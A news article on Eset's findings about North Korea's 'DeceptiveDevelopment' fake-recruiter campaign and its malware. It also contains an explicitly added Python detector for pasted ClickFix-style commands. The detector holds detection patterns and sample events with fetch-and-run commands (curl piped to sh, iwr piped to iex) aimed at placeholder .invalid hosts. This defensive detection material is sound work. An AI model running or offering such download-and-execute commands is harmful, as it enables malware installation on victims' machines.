North Korean Fake Job Recruiters Intensify Their Covert Strategies


Eset Reports: Lazarus Group’s Backdoor Now in Hands of New North Korean Threat Actor

North Korea Fake Job Recruiters Up Their Backdoor Game
Statues of North Korean leaders Kim Il-Sung and Kim Chong-Il in Pyongyang. (Image: Shutterstock/ISMG)

Recent cybersecurity findings reveal that a group of North Korean hackers engaged in fake IT recruitment schemes now has access to a sophisticated remote access Trojan, previously associated with the notorious Lazarus Group. This assessment comes from security experts who have been tracking these activities closely.

According to cybersecurity firm Eset, the North Korean threat actor operates under the alias “DeceptiveDevelopment.” This group is known for impersonating recruiters to lure victims through fraudulent job offers. While some activities bear resemblance to the Lazarus Group’s efforts, particularly incidents labeled as “Operation Dream Job,” Eset asserts that these two factions are distinct entities.

The DeceptiveDevelopment operations have been observed since 2023, targeting job seekers in Western markets. In June, the U.S. Department of Justice announced a coordinated crackdown across 16 states addressing North Korean remote IT scams. This operation resulted in multiple indictments, arrests, and significant seizures, highlighting the scale and persistence of these schemes.

This campaign primarily targets Windows, macOS, and Linux systems, using a deceptive method in which victims are instructed to execute terminal commands during seemingly innocuous “pre-interviews.” One notable tactic, referred to as the “ClickFix trick,” saw attacks rise by more than 500% in the first half of this year.

DeceptiveDevelopment operators cleverly disguise themselves as recruiters on platforms like LinkedIn and various freelance marketplaces, guiding potential candidates through a series of technical evaluations that ultimately compromise their systems. Applicants are asked to perform tasks that involve running commands from a site that simulates a malfunctioning camera, a move designed to initiate malware downloads and execute first-stage payloads.
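The ClickFix-style lure described above depends on the victim pasting a command that fetches and launches a first-stage payload from an interactive session. As an added detection example (not code from Eset or the article), the following Python scans constructed process-creation events for interpreter launches whose command line downloads and executes remote content, and raises the severity when the parent is an interactive shell or the Windows run box. The event field names, regex patterns, parent lists and sample events are assumptions modelled loosely on Sysmon-style telemetry, not details the article provides.

```python
"""Flag interpreter launches whose command line fetches and runs remote content.

Added example, not from the article or Eset. The event shape (id, image,
parent_image, command_line), the pattern list and the sample events below are
constructed assumptions modelled loosely on process-creation telemetry.
"""
import json
import re
from dataclasses import dataclass
from typing import Optional

# Interpreters a victim is typically told to paste into during a ClickFix-style lure.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "bash", "sh", "zsh", "osascript", "python3"}

# Parents that indicate an interactive paste (run box, terminal app) rather than a
# packaged or scheduled process. Constructed list, not from the article.
INTERACTIVE_PARENTS = {"explorer.exe", "Terminal", "iTerm2",
                       "gnome-terminal-server", "konsole"}

# Command-line shapes that pull remote content and hand it straight to an interpreter.
DOWNLOAD_AND_EXECUTE = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I), "pipe-to-shell"),
    (re.compile(r"\b(iwr|Invoke-WebRequest|DownloadString|DownloadFile)\b", re.I), "powershell-download"),
    (re.compile(r"\b(iex|Invoke-Expression)\b", re.I), "powershell-invoke-expression"),
    (re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I), "encoded-command"),
    (re.compile(r"\bmshta(\.exe)?\s+https?://", re.I), "mshta-remote"),
    (re.compile(r"\bbase64\b.*\|\s*(ba|z)?sh\b", re.I), "base64-pipe-to-shell"),
]


@dataclass
class Finding:
    event_id: str
    image: str
    parent: str
    reasons: list
    severity: str


def basename(path: str) -> str:
    """Last path component, tolerating both Windows and POSIX separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1]


def analyze_event(event: dict) -> Optional[Finding]:
    """Return a Finding if the event is an interpreter running a download-and-execute command."""
    image = basename(event.get("image", ""))
    if image not in INTERPRETERS:
        return None
    cmdline = event.get("command_line", "")
    reasons = [name for pattern, name in DOWNLOAD_AND_EXECUTE if pattern.search(cmdline)]
    if not reasons:
        return None
    parent = basename(event.get("parent_image", ""))
    # A user-driven paste from a terminal or run box matches the lure far better
    # than the same command under cron, a service host or a build agent.
    severity = "high" if parent in INTERACTIVE_PARENTS else "medium"
    return Finding(event.get("id", ""), image, parent, reasons, severity)


def scan(lines) -> list:
    """Parse one JSON event per line, skipping malformed lines, and collect findings."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = analyze_event(event)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample events; hosts use the reserved .invalid TLD so nothing resolves.
SAMPLE_EVENTS = [
    {"id": "evt-1", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iwr http://example.invalid/x | iex"'},
    {"id": "evt-2", "image": "/bin/bash", "parent_image": "/System/Applications/Utilities/Terminal",
     "command_line": 'bash -c "curl -fsSL http://example.invalid/fix.sh | sh"'},
    {"id": "evt-3", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell -File C:\build\deploy.ps1"},
    {"id": "evt-4", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "chrome.exe --type=renderer"},
    {"id": "evt-6", "image": "/bin/bash", "parent_image": "/usr/sbin/cron",
     "command_line": 'bash -c "curl -s http://example.invalid/a | bash"'},
]
SAMPLE_LOG_LINES = [json.dumps(e) for e in SAMPLE_EVENTS] + ["this line is not json"]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG_LINES):
        print(f"{f.severity:6} {f.event_id}: {f.image} <- {f.parent} {f.reasons}")
```

The severity split is the useful part: the same `curl ... | sh` string is routine under a build agent but is exactly what a pasted “fix my camera” command looks like when its parent is a terminal app or `explorer.exe`, so the interactive-parent check is what separates the lure from ordinary automation.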

Once compromised, victims typically encounter malware like BeaverTail or its revised version, OtterCookie, which harvests sensitive browser and crypto wallet data. Eset’s findings reveal a second-stage payload, “InvisibleFerret,” which features a modular backdoor capable of stealing data and granting remote access.

In a noteworthy discovery, researchers identified a complex payload dubbed “Tropidoor,” which exhibits similarities to a previous Lazarus Group backdoor called “PostNapTea.” Eset emphasized that Tropidoor represents the most advanced malware yet linked to DeceptiveDevelopment, indicating a clear connection between these two North Korean entities.

Additionally, an emerging Windows remote-access malware, named “AkdoorTea,” was discovered in an archive utilizing legitimate Nvidia components mingled with harmful scripts, exposing the extensive capabilities of these threat actors.

It appears that data extracted from victims by DeceptiveDevelopment may be transferred to an affiliated group known as “WageMole,” which further highlights the interconnected nature of these cybercriminal operations coming out of North Korea and their ongoing threat to organizations worldwide.
